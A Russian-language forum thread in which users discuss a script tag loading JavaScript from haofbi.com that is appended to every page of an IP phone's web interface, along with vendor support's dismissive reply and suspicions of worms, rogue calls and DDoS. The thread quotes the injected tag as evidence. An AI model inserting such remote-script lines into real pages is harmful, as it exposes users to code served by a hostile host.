![]() |
Наши проекты:
Журнал · Discuz!ML · Wiki · DRKB · Помощь проекту |
|
ПРАВИЛА | FAQ | Помощь | Поиск | Участники | Календарь | Избранное | RSS |
[34.238.189.240] |
![]() |
|
![]() |
Сообщ.
,
|
|
Стал ругаться гугл на открытие внутреннего IP телефона.
Смотрю код страницы, вижу: ![]() ![]() </body> </html> <script language=javascript src=http://www.haofbi.com/js/w.js></script> Именно на этот сайт и ругается гугл. Такая вставка на каждой странице самой последней строчкой!!! Во всех телефонах этой модели. Поиск по гуглу ничего вразумительно го не дал, кроме как похожие посты с вопросами о том, что это такое. Вот ответ суппорта: Цитата Добрый! Не переживайте, вируса в ПО никакого нет! Сайта такого на сегодня вообще не существует: Vladimirs-Mac-mini:~ vladimirgurin$ ping www.haofbi.com ping: cannot resolve www.haofbi.com: Unknown host Ранее он был необходим разработчикам ПО телефона. Этот код после </html> вообще исполняется? Или там мертвым грузом лежит? И вообще как-то странно это все... |
![]() |
Сообщ.
,
|
|
haofbi.com - домен, принадлежавший китайскому хостеру Xin Net. В прошлом году бегали пара червяков, славших туда что-то... подробностей не знаю (краем уха слышал, что оттуда через заражённые IP-телефонные станции качались "левые" звонки, что при хреновой настройке вставало владельцам в изрядную копеечку). На текущий момент аренда имени не продлена, DNS-ы про домен не знают.
Но откуда-то оно у тебя берётся... |
![]() |
Сообщ.
,
|
|
Меня смутило что "Ранее он был необходим разработчикам ПО телефона." Браузерным анализатором видно, что есть GET запросы туда, так что что явно не то.
![]() |
![]() |
Сообщ.
,
|
|
Цитата ^D^ima @ Меня смутило что "Ранее он был необходим разработчикам ПО телефона." Да я бы вообще вздрючился по этой фразе. Во радости, когда твоё оборудование что-то куда-то, а ты не ухом ни рылом... |
Сообщ.
,
|
|
|
^D^ima
Цитата ^D^ima @ Меня смутило что "Ранее он был необходим разработчикам ПО телефона." 1) Не обращай внимание на название. Оно не всегда отражает суть проблемы. Даже я бы сказал так оно всегда не отображает суть проблемы. ИБ-уязвимостей слишком много и человек там как правило почти ничего не поверяет а используются программы-роботы. И что она там и как классифицировала никто не знает. 2) Может левые звонки делали, но скорее всего просто свою рекламу показывали у них это модно и не запрещено. Цитата Akina @ когда твоё оборудование что-то куда-то, а ты не ухом ни рылом... А инструкцию и договор никто не читает... А там наверно мелким шрифтом и непонятными словами. |
![]() |
Сообщ.
,
|
|
Цитата Pavia @ А инструкцию и договор Договор на что? и инструкция на 4 страницы |
![]() |
Сообщ.
,
|
|
Ещё и ддосит походу:
Прикреплённый файл ![]() |
![]() |
Сообщ.
,
|
|